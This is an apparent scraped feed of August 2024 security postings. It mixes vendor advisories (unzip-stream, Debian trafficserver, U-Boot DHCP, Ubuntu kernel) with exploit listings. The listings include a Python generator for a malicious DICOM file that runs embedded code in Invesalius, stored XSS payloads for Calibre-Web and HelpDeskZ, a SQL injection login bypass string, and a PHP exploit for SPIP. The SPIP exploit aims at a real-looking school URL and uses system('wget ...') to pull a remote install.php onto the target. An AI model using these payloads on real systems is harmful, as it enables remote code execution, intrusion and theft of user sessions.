### Impact

When using the `Extract()` method of unzip-stream, malicious zip files were able to write to paths they shouldn't be allowed to.

### Patches

Fixed in 0.3.2

### References

- https://snyk.io/research/zip-slip-vulnerability
- https://github.com/mhr3/unzip-stream/compare/v0.3.1...v0.3.2

### Credits

Justin Taft from Google

**unzip-stream allows Arbitrary File Write via artifact extraction**

High severity GitHub Reviewed Published Aug 25, 2024 in mhr3/unzip-stream • Updated Aug 26, 2024

GHSA-6jrj-vc65-c983: unzip-stream allows Arbitrary File Write via artifact extraction

Debian Linux Security Advisory 5758-1 - Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in denial of service or request smuggling.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5758-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 26, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : trafficserverCVE ID         : CVE-2023-38522 CVE-2024-35161 CVE-2024-35296Several vulnerabilities were discovered in Apache Traffic Server,a reverse and forward proxy server, which could result in denialof service or request smuggling.For the stable distribution (bookworm), these problems have been fixed inversion 9.2.5+ds-0+deb12u1.We recommend that you upgrade your trafficserver packages.For the detailed security status of trafficserver please refer toits security tracker page at:https://security-tracker.debian.org/tracker/trafficserverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbMKBEACgkQEMKTtsN8TjZOnw/+JNcO3mLjDjMwWUBfg7w/jCN8tIKJjAGs1bPzJ+QTOs4yy+47wWtAeJ5cQ3PrzETcXLNxFKAI+ii+Tq9DetvvgJYzm2Qxm9xeNJuhjMnUs226Om8VawTH8yL4ijKuZZlEBCAoUTi5+ROQ6H+TDQ3KJIt/xiQp9JuDYPGBbNsyoEl+eOdmVRZTroBoheMsrvCMLneLV5kmr1IpIJfJgXvnuR57idyHAry9GOJ0xaMRdohE6oYqWuG+DeF31fr10jbSgX9M+tUtw1t7sFtoHjXlf3ez8fTOQ/aa+4idHtPd4GBkfDCKb+BnoazguuG9esu8RmfZisOFYQX4O3Bgi8KSM0Ir5Mv9sOkvy95Iqd1dJ2kjHFlvgbzzbATFaSMlj/lUwG2ALq2hoZ4IfuwLKr0hTguHtKTcralE7w+8+pbzMPzULXUw8vPIFGHqVKS0S6XzXHuFchyhfKJFXuUD4uAjijVPzCAMyvlIH98hBfRSbzOP1dwRrHN7YVk4fmkf6yjQ5hB/ecXFCQkXJUXOJNwm41sMpZUkdywFh1iFnV6Hl3We3JD0wdjURReY4ZzGR2PkgWQN56UvkzF4xq8VmtBZ3lTSHH6kmmlgpmBFgtdWhnvl/3Jp4dfO3uh52Lt5vf01Ae4jkT+93uaMtDlr8YBEr2JHLEWCA3ZRC4ux3mnGRN8==Q6vb-----END PGP SIGNATURE-----

Debian Security Advisory 5758-1

Das U-Boot suffers from a buffer overread vulnerability. An attacker with access to the local network and faster response times than the default DHCP server can trigger a memory leak by responding with malicious DHCP offers to a vulnerable U-Boot DHCP client.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2024-004: Buffer overread in U-Boot DHCP

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2024-42040

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2024-004/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2024-004.txt

Affected products/vendor  
========================

Das U-Boot, https://docs.u-boot.org

Summary  
=======

Das U-Boot (U-Boot) is a widespread open-source boot loader used in   
embedded devices to perform various low-level hardware initialization   
tasks and boot the device's operating system kernel. During an embedded   
security assessment, we identified a buffer overread vulnerability   
(CWE-126) in the DHCP implementation of U-Boot that could leak memory   
onto the network. The amount of leaked data depends on the later use of   
the hostname, DNS-server IP, gateway IP, or other DHCP options in   
unencrypted network traffic. The vulnerability has been present since   
the "Initial revision" commit (3861aa5) from 2002.

Risk  
====

An attacker with access to the local network and faster response times   
than the default DHCP server can trigger a memory leak by responding   
with malicious DHCP offers to a vulnerable U-Boot DHCP client. In the   
current implementation, only 4 Bytes of data can be leaked via gateway   
or DNS server address. When net_hostname would be used and also sent   
over the network, 32 Bytes could be retrieved. When the bp_vend field is   
filled with zeroes besides the magic number, it could also lead the loop   
to continue outside the packet to process data. This can cause further   
data to be leaked when values like 0x1,0x3,0x6, and 0x12 are present in   
that data. When further vulnerabilities can be found they might be   
combined to achieve further harmful impact to the system.

Description  
===========

After U-Boot sends an initial DHCP request, the vulnerable bootp_handler   
gets registered as a callback for incoming packets. The handler first   
checks if the received packet is the expected reply packet. If   
VENDOR_MAGIC is in the first four bytes of bp->bp_vend, the address of   
bp->bp_vend[4] and the total length of the packet is passed to   
bootp_process_vendor (net/bootp.c:381) without being reduced to   
len-(offsetof(struct bootp_hdr,bp_vend)+4). There is also a missing   
check whether the first four bytes of bp->pb_vend[] are in range of the   
packet length before retrieving them to compare with htonl(VENDOR_MAGIC).

In bootp_process_vendor, an incorrect end address is then calculated   
based on the full packet length (net/bootp.c:312) instead of the rest of   
the bp_vend buffer size. Then, the function increases the ext pointer   
until it no longer points to zero bytes within the too-long buffer range   
or when one byte is 0xff. When a none-zero value is discovered the ext   
pointer is passed to bootp_process_vendor_field.

In bootp_process_vendor_field, the de-referenced value of the passed   
pointer is used to select the case for processing the field, and its   
length is de-referenced from ext+1. Based on the selected case, values   
are then copied to variables and buffers like net_gateway.s_addr or   
net_hostname from ext+2. The copied lengths are only limited by the size   
of their destination. The end of the bp_vend structure or the end of the   
packet is never checked in bootp_process_vendor_field.

This allows an attacker, who can respond to DHCP requests, to craft a   
packet that causes the code to copy the contents of the target's RAM   
directly following the received packet into parameters. These parameters   
are sent via the network during later use, leaking the RAM content to   
the attacker.

Solution/Mitigation  
===================

We recommend providing an adequate length to bootp_process_vendor to   
prevent the while loop from stepping outside the packet frame and   
checking in bootp_process_vendor_field if the copied data is still   
within the packet structure's range.

Disclosure timeline  
===================

2024-06-21: Vulnerability discovered  
2024-08-19: Vulnerability reported to public mailing list by request of   
maintainer.

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Simon Diepold   
of SCHUTZWERK GmbH.

References  
==========

Disclaimer  
==========

The information provided in this security advisory is provided "as is" and  
without warranty of any kind. Details of this security advisory may be   
updated  
in order to provide as accurate information as possible. The most recent  
version of this security advisory can be found at SCHUTZWERK GmbH's website  
( https://www.schutzwerk.com ).

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmbC+YgaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtSeRAAi6OrwHBpbFgKlyqROQnw  
zYxmHTYBiWzBEEmI1zN+iNb5uQlnZXgBoodbEneiRmVQDSiT4zT/DWe3EGV2TlRR  
56hEIGvkvleURqCjwRYeYnPF3Ef/XMTvTu/x08h8UfGr7XNwhwCpANxUTE7aI01b  
jZLa4jDv8vpNd7JKNF32S2Ak6GRjfEE9aEAxUKliNXCA5SU1gYvOWQ+BJ0oth7fN  
grkTKffltk8dUBFy8TsrxcAG5ye4f1Dvm51dU8JNPBLkmouOrEvX1K4UTjvAyD8e  
bCn2dXs2rDLfywrTPV0k2zj3APZiwhYxNA3MaTUGscZAIUMn3WE/cUyYDpQDqOYx  
wrZzz9K59m+x8F6c1lBUxlmU3t9Z15/i/tL6Kropb+HDxjWaLCZPG3dzdlR54/fn  
gvzS393FNWakNNAJIqN2jvvol+zvJGn2rsSsfp5CPEdrQEHgvQa0TkBOpdtFZ/h1  
muVFwj9yDup07yStTXRJHjg2WCH0LdL5x+mDfcBspjLflpVP/0Yj+MnR8e3Eb7v/  
Cb12PeBHww9VObUhgbMecanSn6Epf7Nc5a5wIh5kEWKoviBYNY/0cu7GDN+70PK4  
JhD86Tww5RFJJfkLcJqlCAMC4AkAc7Sq5FS7WTK5Jx3Ymh/+Lsuhx9ENq38VyVGh  
tFe3V0joTUxg7Yy78PoEOrs=  
=XKZo  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm /  HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Das U-Boot Buffer Overread

Invesalius versions 3.1.99991 through 3.1.99998 suffer from a remote code execution vulnerability. The exploitation steps of this vulnerability involve the use of a specifically crafted DICOM file which, once imported inside the victim's client application, allows an attacker to gain remote code execution.

    # Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)# Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Vendor Homepage: https://invesalius.github.io/# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius# Version: 3.1.99991 to 3.1.99998# Tested on: Windows# CVE-ID: CVE-2024-42845# External references: https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan, https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845#### exploit to create the malicious DICOM file###import pydicomimport base64import argparsepydicom.config.settings.reading_validation_mode = pydicom.config.IGNOREdef encode_payload(plain_payload):    data = open(plain_payload, 'rb').read()    return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"def prepare_dicom_payload(dicom_file_path, sign, payload):    try:        dicom_data = pydicom.dcmread(dicom_file_path)        if sign:            dicom_data.Manufacturer = "Malicious DICOM file creator"            dicom_data.InstitutionName = "Malicious DICOM file institution"        values = dicom_data[0x0020, 0x0032].value        mal = [str(i) for i in values]        mal.append(encode_payload(payload))            except pydicom.errors.InvalidDicomError:        print("The file is not a valid DICOM file.")    except Exception as e:        print(f"An error occurred: {e}")        return maldef modify_dicom_field(dicom_file_path, malicious_tag, outfile):    try:        dicom_dataset = pydicom.dcmread(dicom_file_path)        elem =  pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)        dicom_dataset[0x00200032] = elem        print(dicom_dataset)        dicom_dataset.save_as(outfile)    except Exception as e:        print(f"An error occurred: {e}")if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Read a DICOM file.')    parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')    parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')    parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')    parser.add_argument('--signature', required=False, default=True)        args = parser.parse_args()    dicom_infile_path = args.dicom    dicom_outfile_path = args.outfile        tmp_tag = prepare_dicom_payload(dicom_infile_path, sign=args.signature, payload=args.payload)    if tmp_tag:        malicious_tag = '\\'.join(tmp_tag)        modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path)        exit(0)    else:        exit(1)

Invesalius 3.1 Remote Code Execution

Calibre Web version 0.6.21 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Calibre-web# Date: 07/05/2024# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache)# Vendor Homepage: (https://github.com/janeczku/calibre-web/)# Version: 0.6.21 - Romesa# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml  4.9.4# CVE: CVE-2024-39123## Vulnerability DescriptionCalibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.## Steps to Reproduce1. Log in to the application.2. Upload a new book.3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint.4. In the `Comments` field, input the following payload:    <a href=javas%1Bcript:alert()>Hello there!</a>4. Save the changes.5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

Calibre Web 0.6.21 Cross Site Scripting

Ubuntu Security Notice 6974-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6974-2August 23, 2024linux-oracle-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - User-Mode Linux (UML);   - MMC subsystem;   - Network drivers;   - GFS2 file system;   - IPv4 networking;   - IPv6 networking;(CVE-2024-26921, CVE-2023-52629, CVE-2024-26680, CVE-2024-26830,CVE-2024-39484, CVE-2024-39292, CVE-2024-36901, CVE-2023-52760)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.15.0-1066-oracle  5.15.0-1066.72~20.04.1   linux-image-oracle              5.15.0.1066.72~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6974-2   https://ubuntu.com/security/notices/USN-6974-1   CVE-2023-52629, CVE-2023-52760, CVE-2024-26680, CVE-2024-26830,   CVE-2024-26921, CVE-2024-36901, CVE-2024-39292, CVE-2024-39484Package Information:  https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1066.72~20.04.1

Ubuntu Security Notice USN-6974-2

Helpdeskz version 2.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS Vulnerability via File Name# Google Dork: N/A# Date: 08 Aug 2024# Exploit Author: Md. Sadikul Islam# Vendor Homepage: https://www.helpdeskz.com/# Software Link:https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip# Version: v2.0.2# Tested on: Kali Linux /  Firefox 115.1.0esr (64-bit)# CVE : N/APayload: "><img src=x onerror=alert(1);>Filename can be Payload: "><img src=x onerror=alert(1);>.jpgVIdeo PoC:https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_linkSteps to Reproduce:    1. Log in as a regular user and create a new ticket.    2. Fill out all the required fields with the necessary information.    3. Attach an image file with a malicious payload embedded in thefilename.    4. Submit the ticket.    5. Access the ticket from the administration panel to trigger thepayload execution.Cross-Site Scripting (XSS) exploits can compromise the administrationpanel, directly affecting administrators by allowing malicious scripts toexecute within their privileged environment.

Helpdeskz 2.0.2 Cross Site Scripting

SPIP version 4.2.11 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.11 PHP Code execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("wget https://raw.githubusercontent.com/indoushka/Mari/master/install.php");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.11 Code Execution

Loan Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Loan Management System 1.0 Auth By Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : User&Pass = ' or 0=0 ##[+] http://127.0.0.1/loan/index.php?page=homeGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Loan Management System 1.0 SQL Injection

Ubuntu Security Notice 6973-2 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6973-2August 23, 2024linux-azure-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systemsDetails:It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - MMC subsystem;   - Network drivers;   - SCSI drivers;   - GFS2 file system;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;(CVE-2024-26830, CVE-2024-39484, CVE-2024-36901, CVE-2024-26929,CVE-2024-26921, CVE-2021-46926, CVE-2023-52629, CVE-2023-52760)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-5.4.0-1136-azure    5.4.0-1136.143~18.04.1                                   Available with Ubuntu Pro   linux-image-azure               5.4.0.1136.143~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6973-2   https://ubuntu.com/security/notices/USN-6973-1   CVE-2021-46926, CVE-2023-52629, CVE-2023-52760, CVE-2024-24860,   CVE-2024-26830, CVE-2024-26921, CVE-2024-26929, CVE-2024-36901,   CVE-2024-39484

Tag

#vulnerability